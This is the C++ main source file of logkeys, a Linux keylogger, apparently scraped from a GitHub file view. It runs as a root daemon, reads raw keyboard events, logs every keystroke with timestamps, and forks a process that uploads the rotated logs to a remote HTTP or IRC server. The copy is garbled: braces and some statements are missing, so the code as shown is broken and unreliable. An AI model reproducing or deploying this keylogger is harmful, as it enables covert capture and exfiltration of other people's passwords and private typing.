
642 lines
23 KiB
Raw Normal View History

Copyleft (ɔ) 2009 Kernc
This program is free software. It comes with absolutely no warranty whatsoever.
See COPYING for further information.
Project homepage: https://github.com/kernc/logkeys
#include <cstdio>
#include <cerrno>
#include <cwchar>
#include <vector>
#include <cstring>
#include <fstream>
#include <sstream>
#include <cstdlib>
#include <csignal>
#include <error.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <linux/input.h>
# include <config.h> // include config produced from ./configure
# define PACKAGE_VERSION "0.1.2" // if PACKAGE_VERSION wasn't defined in <config.h>
// the following path-to-executable macros should be defined in config.h;
#ifndef EXE_PS
# define EXE_PS "/bin/ps"
#ifndef EXE_GREP
# define EXE_GREP "/bin/grep"
# define EXE_DUMPKEYS "/usr/bin/dumpkeys"
#define COMMAND_STR_DUMPKEYS ( EXE_DUMPKEYS " -n | " EXE_GREP " '^\\([[:space:]]shift[[:space:]]\\)*\\([[:space:]]altgr[[:space:]]\\)*keycode'" )
#define COMMAND_STR_GET_PID ( (std::string(EXE_PS " ax | " EXE_GREP " '") + program_invocation_name + "' | " EXE_GREP " -v grep").c_str() )
#define INPUT_EVENT_PATH "/dev/input/" // standard path
#define DEFAULT_LOG_FILE "/var/log/logkeys.log"
#define PID_FILE "/var/run/logkeys.pid"
#include "usage.cc" // usage() function
#include "args.cc" // global arguments struct and arguments parsing
#include "keytables.cc" // character and function key tables and helper functions
#include "upload.cc" // functions concerning remote uploading of log file
namespace logkeys {
// executes cmd and returns string ouput
std::string execute(const char* cmd)
FILE* pipe = popen(cmd, "r");
if (!pipe)
error(EXIT_FAILURE, errno, "Pipe error");
char buffer[128];
std::string result = "";
if(fgets(buffer, 128, pipe) != NULL)
result += buffer;
return result;
int input_fd = -1; // input event device file descriptor; global so that signal_handler() can access it
void signal_handler(int signal)
if (input_fd != -1)
close(input_fd); // closing input file will break the infinite while loop
void set_utf8_locale()
// set locale to common UTF-8 for wchars to be recognized correctly
if(setlocale(LC_CTYPE, "en_US.UTF-8") == NULL) { // if en_US.UTF-8 isn't available
char *locale = setlocale(LC_CTYPE, ""); // try the locale that corresponds to the value of the associated environment variable LC_CTYPE
if (locale != NULL &&
(strstr(locale, "UTF-8") != NULL || strstr(locale, "UTF8") != NULL ||
strstr(locale, "utf-8") != NULL || strstr(locale, "utf8") != NULL) )
; // if locale has "UTF-8" in its name, it is cool to do nothing
error(EXIT_FAILURE, 0, "LC_CTYPE locale must be of UTF-8 type, or you need en_US.UTF-8 availabe");
void exit_cleanup(int status, void *discard)
// TODO:
void create_PID_file()
// create temp file carrying PID for later retrieval
int pid_fd = open(PID_FILE, O_WRONLY | O_CREAT | O_EXCL, 0644);
if (pid_fd != -1) {
char pid_str[16] = {0};
sprintf(pid_str, "%d", getpid());
if (write(pid_fd, pid_str, strlen(pid_str)) == -1)
error(EXIT_FAILURE, errno, "Error writing to PID file '" PID_FILE "'");
else {
if (errno == EEXIST)
error(EXIT_FAILURE, errno, "Another process already running? Quitting. (" PID_FILE ")");
else error(EXIT_FAILURE, errno, "Error opening PID file '" PID_FILE "'");
void kill_existing_process()
pid_t pid;
bool via_file = true;
bool via_pipe = true;
FILE *temp_file = fopen(PID_FILE, "r");
via_file &= (temp_file != NULL);
if (via_file) { // kill process with pid obtained from PID file
via_file &= (fscanf(temp_file, "%d", &pid) == 1);
if (!via_file) { // if reading PID from temp_file failed, try ps-grep pipe
via_pipe &= (sscanf(execute(COMMAND_STR_GET_PID).c_str(), "%d", &pid) == 1);
via_pipe &= (pid != getpid());
if (via_file || via_pipe) {
kill(pid, SIGINT);
exit(EXIT_SUCCESS); // process killed successfully, exit
error(EXIT_FAILURE, 0, "No process killed");
void set_signal_handling()
{ // catch SIGHUP, SIGINT and SIGTERM signals to exit gracefully
struct sigaction act = {{0}};
act.sa_handler = signal_handler;
sigaction(SIGHUP, &act, NULL);
sigaction(SIGINT, &act, NULL);
sigaction(SIGTERM, &act, NULL);
// prevent child processes from becoming zombies
act.sa_handler = SIG_IGN;
sigaction(SIGCHLD, &act, NULL);
void determine_system_keymap()
// custom map will be used; erase existing US keymapping
memset(char_keys, '\0', sizeof(char_keys));
memset(shift_keys, '\0', sizeof(shift_keys));
memset(altgr_keys, '\0', sizeof(altgr_keys));
// get keymap from dumpkeys
// if one knows of a better, more portable way to get wchar_t-s from symbolic keysym-s from `dumpkeys` or `xmodmap` or another, PLEASE LET ME KNOW! kthx
std::stringstream ss, dump(execute(COMMAND_STR_DUMPKEYS)); // see example output after i.e. `loadkeys slovene`
std::string line;
unsigned int i = 0; // keycode
int index;
int utf8code; // utf-8 code of keysym answering keycode i
while (std::getline(dump, line)) {
utf8code = 0;
// replace any U+#### with 0x#### for easier parsing
index = line.find("U+", 0);
while (static_cast<std::string::size_type>(index) != std::string::npos) {
line[index] = '0'; line[index + 1] = 'x';
index = line.find("U+", index);
if (++i >= sizeof(char_or_func)) break; // only ever map keycodes up to 128 (currently N_KEYS_DEFINED are used)
if (!is_char_key(i)) continue; // only map character keys of keyboard
assert(line.size() > 0);
if (line[0] == 'k') { // if line starts with 'keycode'
index = to_char_keys_index(i);
ss << &line[14]; // 1st keysym starts at index 14 (skip "keycode XXX = ")
ss >> std::hex >> utf8code;
// 0XB00CLUELESS: 0xB00 is added to some keysyms that are preceeded with '+'; I don't really know why; see `man keymaps`; `man loadkeys` says numeric keysym values aren't to be relied on, orly?
if (line[14] == '+' && (utf8code & 0xB00)) utf8code ^= 0xB00;
char_keys[index] = static_cast<wchar_t>(utf8code);
// if there is a second keysym column, assume it is a shift column
if (ss >> std::hex >> utf8code) {
if (line[14] == '+' && (utf8code & 0xB00)) utf8code ^= 0xB00;
shift_keys[index] = static_cast<wchar_t>(utf8code);
// if there is a third keysym column, assume it is an altgr column
if (ss >> std::hex >> utf8code) {
if (line[14] == '+' && (utf8code & 0xB00)) utf8code ^= 0xB00;
altgr_keys[index] = static_cast<wchar_t>(utf8code);
// else if line starts with 'shift i'
index = to_char_keys_index(--i);
ss << &line[21]; // 1st keysym starts at index 21 (skip "\tshift\tkeycode XXX = " or "\taltgr\tkeycode XXX = ")
ss >> std::hex >> utf8code;
if (line[21] == '+' && (utf8code & 0xB00)) utf8code ^= 0xB00; // see line 0XB00CLUELESS
if (line[1] == 's') // if line starts with "shift"
shift_keys[index] = static_cast<wchar_t>(utf8code);
if (line[1] == 'a') // if line starts with "altgr"
altgr_keys[index] = static_cast<wchar_t>(utf8code);
} // while (getline(dump, line))
void parse_input_keymap()
// custom map will be used; erase existing US keytables
memset(char_keys, '\0', sizeof(char_keys));
memset(shift_keys, '\0', sizeof(shift_keys));
memset(altgr_keys, '\0', sizeof(altgr_keys));
stdin = freopen(args.keymap.c_str(), "r", stdin);
if (stdin == NULL)
error(EXIT_FAILURE, errno, "Error opening input keymap '%s'", args.keymap.c_str());
unsigned int i = -1;
unsigned int line_number = 0;
wchar_t func_string[32];
wchar_t line[32];
while (!feof(stdin)) {
if (++i >= sizeof(char_or_func)) break; // only ever read up to 128 keycode bindings (currently N_KEYS_DEFINED are used)
if (is_used_key(i)) {
if(fgetws(line, sizeof(line), stdin) == NULL) {
if (feof(stdin)) break;
else error_at_line(EXIT_FAILURE, errno, args.keymap.c_str(), line_number, "fgets() error");
// line at most 8 characters wide (func lines are "1234567\n", char lines are "1 2 3\n")
if (wcslen(line) > 8) // TODO: replace 8*2 with 8 and wcslen()!
error_at_line(EXIT_FAILURE, 0, args.keymap.c_str(), line_number, "Line too long!");
// terminate line before any \r or \n
std::wstring::size_type last = std::wstring(line).find_last_not_of(L"\r\n");
if (last == std::wstring::npos)
error_at_line(EXIT_FAILURE, 0, args.keymap.c_str(), line_number, "No characters on line");
line[last + 1] = '\0';
if (is_char_key(i)) {
unsigned int index = to_char_keys_index(i);
if (swscanf(line, L"%lc %lc %lc", &char_keys[index], &shift_keys[index], &altgr_keys[index]) < 1) {
error_at_line(EXIT_FAILURE, 0, args.keymap.c_str(), line_number, "Too few input characters on line");
if (is_func_key(i)) {
if (i == KEY_SPACE) continue; // space causes empty string and trouble
if (swscanf(line, L"%7ls", &func_string[0]) != 1)
error_at_line(EXIT_FAILURE, 0, args.keymap.c_str(), line_number, "Invalid function key string"); // does this ever happen?
wcscpy(func_keys[to_func_keys_index(i)], func_string);
} // while (!feof(stdin))
if (line_number < N_KEYS_DEFINED)
#define QUOTE(x) #x // quotes x so it can be used as (char*)
error(EXIT_FAILURE, 0, "Too few lines in input keymap '%s'; There should be " QUOTE(N_KEYS_DEFINED) " lines!", args.keymap.c_str());
void export_keymap_to_file()
int keymap_fd = open(args.keymap.c_str(), O_CREAT | O_EXCL | O_WRONLY, 0644);
if (keymap_fd == -1)
error(EXIT_FAILURE, errno, "Error opening output file '%s'", args.keymap.c_str());
char buffer[32];
int buflen = 0;
unsigned int index;
for (unsigned int i = 0; i < sizeof(char_or_func); ++i) {
buflen = 0;
if (is_char_key(i)) {
index = to_char_keys_index(i);
// only export non-null characters
if (char_keys[index] != L'\0' &&
shift_keys[index] != L'\0' &&
altgr_keys[index] != L'\0')
buflen = sprintf(buffer, "%lc %lc %lc\n", char_keys[index], shift_keys[index], altgr_keys[index]);
else if (char_keys[index] != L'\0' &&
shift_keys[index] != L'\0')
buflen = sprintf(buffer, "%lc %lc\n", char_keys[index], shift_keys[index]);
else if (char_keys[index] != L'\0')
buflen = sprintf(buffer, "%lc\n", char_keys[index]);
else // if all \0, export nothing on that line (=keymap will not parse)
buflen = sprintf(buffer, "\n");
else if (is_func_key(i)) {
buflen = sprintf(buffer, "%ls\n", func_keys[to_func_keys_index(i)]);
if (is_used_key(i))
if (write(keymap_fd, buffer, buflen) < buflen)
error(EXIT_FAILURE, errno, "Error writing to keymap file '%s'", args.keymap.c_str());
error(EXIT_SUCCESS, 0, "Success writing keymap to file '%s'", args.keymap.c_str());
void determine_input_device()
// better be safe than sory: while running other programs, switch user to nobody
setegid(65534); seteuid(65534);
// extract input number from /proc/bus/input/devices (I don't know how to do it better. If you have an idea, please let me know.)
// The compiler automatically concatenates these adjacent strings to a single string.
const char* cmd = EXE_GREP " -E 'Handlers|EV=' /proc/bus/input/devices | "
EXE_GREP " -B1 'EV=1[02]001[3Ff]' | "
EXE_GREP " -Eo 'event[0-9]+' ";
std::stringstream output(execute(cmd));
std::vector<std::string> results;
std::string line;
while(std::getline(output, line)) {
std::string::size_type i = line.find("event");
if (i != std::string::npos) i += 5; // "event".size() == 5
if (i < line.size()) {
int index = atoi(&line.c_str()[i]);
if (index != -1) {
std::stringstream input_dev_path;
input_dev_path << INPUT_EVENT_PATH;
input_dev_path << "event";
input_dev_path << index;
if (results.size() == 0) {
error(0, 0, "Couldn't determine keyboard device. :/");
error(EXIT_FAILURE, 0, "Please post contents of your /proc/bus/input/devices file as a new bug report. Thanks!");
args.device = results[0]; // for now, use only the first found device
// now we reclaim those root privileges
seteuid(0); setegid(0);
int main(int argc, char **argv)
on_exit(exit_cleanup, NULL);
if (geteuid()) error(EXIT_FAILURE, errno, "Got r00t?");
args.logfile = (char*) DEFAULT_LOG_FILE; // default log file will be used if none specified
process_command_line_arguments(argc, argv);
// kill existing logkeys process
if (args.kill) kill_existing_process();
// if neither start nor export, that must be an error
if (!args.start && !(args.flags & FLAG_EXPORT_KEYMAP)) { usage(); exit(EXIT_FAILURE); }
// if posting remote and post_size not set, set post_size to default [500K bytes]
if (args.post_size == 0 && (!args.http_url.empty() || !args.irc_server.empty())) {
args.post_size = 500000;
// check for incompatible flags
if (!args.keymap.empty() && (!(args.flags & FLAG_EXPORT_KEYMAP) && args.us_keymap)) { // exporting uses args.keymap also
error(EXIT_FAILURE, 0, "Incompatible flags '-m' and '-u'. See usage.");
if (args.flags & FLAG_EXPORT_KEYMAP) {
if (!args.us_keymap)
// = exit(0)
else if (!args.keymap.empty()) // custom keymap in use
if (args.device.empty()) { // no device given with -d switch
else { // event device supplied as -d argument
std::string::size_type i = args.device.find_last_of('/');
args.device = (std::string(INPUT_EVENT_PATH) + args.device.substr(i == std::string::npos ? 0 : i + 1));
int nochdir = 0;
if (args.logfile[0] != '/')
nochdir = 1; // don't chdir (logfile specified with relative path)
int noclose = 1; // don't close streams (stderr used)
if (daemon(nochdir, noclose) == -1) // become daemon
error(EXIT_FAILURE, errno, "Failed to become daemon");
close(STDIN_FILENO); close(STDOUT_FILENO); // leave stderr open
// open input device for reading
input_fd = open(args.device.c_str(), O_RDONLY);
if (input_fd == -1) {
error(EXIT_FAILURE, errno, "Error opening input event device '%s'", args.device.c_str());
// if log file is other than default, then better seteuid() to the getuid() in order to ensure user can't write to where she shouldn't!
if (args.logfile == DEFAULT_LOG_FILE) {
// open log file (if file doesn't exist, create it with safe 0600 permissions)
FILE *out = fopen(args.logfile.c_str(), "a");
if (!out)
error(EXIT_FAILURE, errno, "Error opening output file '%s'", args.logfile.c_str());
// now we need those privileges back in order to create system-wide PID_FILE
seteuid(0); setegid(0);
// now we've got everything we need, finally drop privileges by becoming 'nobody'
//setegid(65534); seteuid(65534); // commented-out, I forgot why xD
unsigned int scan_code, prev_code = 0; // the key code of the pressed key (some codes are from "scan code set 1", some are different (see <linux/input.h>)
struct input_event event;
char timestamp[32]; // timestamp string, long enough to hold format "\n%F %T%z > "
bool shift_in_effect = false;
bool altgr_in_effect = false;
bool ctrl_in_effect = false; // used for identifying Ctrl+C / Ctrl+D
int count_repeats = 0; // count_repeats differs from the actual number of repeated characters! afaik, only the OS knows how these two values are related (by respecting configured repeat speed and delay)
struct stat st;
stat(args.logfile.c_str(), &st);
off_t file_size = st.st_size; // log file is currently file_size bytes "big"
int inc_size; // is added to file_size in each iteration of keypress reading, adding number of bytes written to log file in that iteration
time_t cur_time;
#define TIME_FORMAT "%F %T%z > " // results in YYYY-mm-dd HH:MM:SS+ZZZZ
strftime(timestamp, sizeof(timestamp), TIME_FORMAT, localtime(&cur_time));
if (args.flags & FLAG_NO_TIMESTAMPS)
file_size += fprintf(out, "Logging started at %s\n\n", timestamp);
file_size += fprintf(out, "Logging started ...\n\n%s", timestamp);
// infinite loop: exit gracefully by receiving SIGHUP, SIGINT or SIGTERM (of which handler closes input_fd)
while (read(input_fd, &event, sizeof(struct input_event)) > 0) {
// these event.value-s aren't defined in <linux/input.h> ?
#define EV_MAKE 1 // when key pressed
#define EV_BREAK 0 // when key released
#define EV_REPEAT 2 // when key switches to repeating after short delay
if (event.type != EV_KEY) continue; // keyboard events are always of type EV_KEY
inc_size = 0;
scan_code = event.code;
if (scan_code >= sizeof(char_or_func)) { // keycode out of range, log error
inc_size += fprintf(out, "<E-%x>", scan_code);
if (inc_size > 0) file_size += inc_size;
// if remote posting is enabled and size treshold is reached
if (args.post_size != 0 && file_size >= args.post_size && stat(UPLOADER_PID_FILE, &st) == -1) {
std::stringstream ss;
for (int i = 1;; ++i) {
ss << args.logfile << "." << i;
if (stat(ss.str().c_str(), &st) == -1) break; // file .log.i doesn't yet exist
if (rename(args.logfile.c_str(), ss.str().c_str()) == -1) // move current log file to indexed
error(EXIT_FAILURE, errno, "Error renaming logfile");
out = fopen(args.logfile.c_str(), "a"); // open empty log file with the same name
if (!out)
error(EXIT_FAILURE, errno, "Error opening output file '%s'", args.logfile.c_str());
file_size = 0; // new log file is now empty
// write new timestamp
strftime(timestamp, sizeof(timestamp), TIME_FORMAT, localtime(&cur_time));
if (args.flags & FLAG_NO_TIMESTAMPS)
file_size += fprintf(out, "Logging started at %s\n\n", timestamp);
file_size += fprintf(out, "Logging started ...\n\n%s", timestamp);
if (!args.http_url.empty() || !args.irc_server.empty()) {
switch (fork()) {
case -1: error(0, errno, "Error while forking remote-posting process");
case 0:
start_remote_upload(); // child process will upload the .log.i files
// on key repeat ; must check before on key press
if (event.value == EV_REPEAT) {
} else if (count_repeats) {
if (prev_code == KEY_RIGHTSHIFT || prev_code == KEY_LEFTCTRL ||
prev_code == KEY_RIGHTALT || prev_code == KEY_LEFTALT ||
prev_code == KEY_LEFTSHIFT || prev_code == KEY_RIGHTCTRL); // if repeated key is modifier, do nothing
else {
if ((args.flags & FLAG_NO_FUNC_KEYS) && is_func_key(prev_code)); // if repeated was function key, and if we don't log function keys, then don't log repeat either
else inc_size += fprintf(out, "<#+%d>", count_repeats);
count_repeats = 0; // reset count for future use
// on key press
if (event.value == EV_MAKE) {
// on ENTER key or Ctrl+C/Ctrl+D event append timestamp
if (scan_code == KEY_ENTER || scan_code == KEY_KPENTER ||
(ctrl_in_effect && (scan_code == KEY_C || scan_code == KEY_D))) {
if (ctrl_in_effect)
inc_size += fprintf(out, "%lc", char_keys[to_char_keys_index(scan_code)]); // log C or D
if (args.flags & FLAG_NO_TIMESTAMPS)
inc_size += fprintf(out, "\n");
else {
strftime(timestamp, sizeof(timestamp), "\n" TIME_FORMAT, localtime(&event.time.tv_sec));
inc_size += fprintf(out, "%s", timestamp); // then newline and timestamp
if (inc_size > 0) file_size += inc_size;
continue; // but don't log "<Enter>"
if (scan_code == KEY_LEFTSHIFT || scan_code == KEY_RIGHTSHIFT)
shift_in_effect = true;
if (scan_code == KEY_RIGHTALT)
altgr_in_effect = true;
if (scan_code == KEY_LEFTCTRL || scan_code == KEY_RIGHTCTRL)
ctrl_in_effect = true;
// print character or string coresponding to received keycode; only print chars when not \0
if (is_char_key(scan_code)) {
wchar_t wch;
if (altgr_in_effect) {
wch = altgr_keys[to_char_keys_index(scan_code)];
if (wch == L'\0') {
wch = shift_keys[to_char_keys_index(scan_code)];
wch = char_keys[to_char_keys_index(scan_code)];
else if (shift_in_effect) {
wch = shift_keys[to_char_keys_index(scan_code)];
if (wch == L'\0')
wch = char_keys[to_char_keys_index(scan_code)];
else // neither altgr nor shift are effective, this is a normal char
wch = char_keys[to_char_keys_index(scan_code)];
if (wch != L'\0') inc_size += fprintf(out, "%lc", wch); // write character to log file
else if (is_func_key(scan_code)) {
if (!(args.flags & FLAG_NO_FUNC_KEYS)) { // only log function keys if --no-func-keys not requested
inc_size += fprintf(out, "%ls", func_keys[to_func_keys_index(scan_code)]);
else if (scan_code == KEY_SPACE || scan_code == KEY_TAB) {
inc_size += fprintf(out, " "); // but always log a single space for Space and Tab keys
else inc_size += fprintf(out, "<E-%x>", scan_code); // keycode is neither of character nor function, log error
} // if (EV_MAKE)
// on key release
if (event.value == EV_BREAK) {
if (scan_code == KEY_LEFTSHIFT || scan_code == KEY_RIGHTSHIFT)
shift_in_effect = false;
if (scan_code == KEY_RIGHTALT)
altgr_in_effect = false;
if (scan_code == KEY_LEFTCTRL || scan_code == KEY_RIGHTCTRL)
ctrl_in_effect = false;
prev_code = scan_code;
if (inc_size > 0) file_size += inc_size;
} // while (read(input_fd))
// append final timestamp, close files and exit
strftime(timestamp, sizeof(timestamp), "%F %T%z", localtime(&cur_time));
fprintf(out, "\n\nLogging stopped at %s\n\n", timestamp);
} // main()
} // namespace logkeys
int main(int argc, char** argv)
return logkeys::main(argc, argv);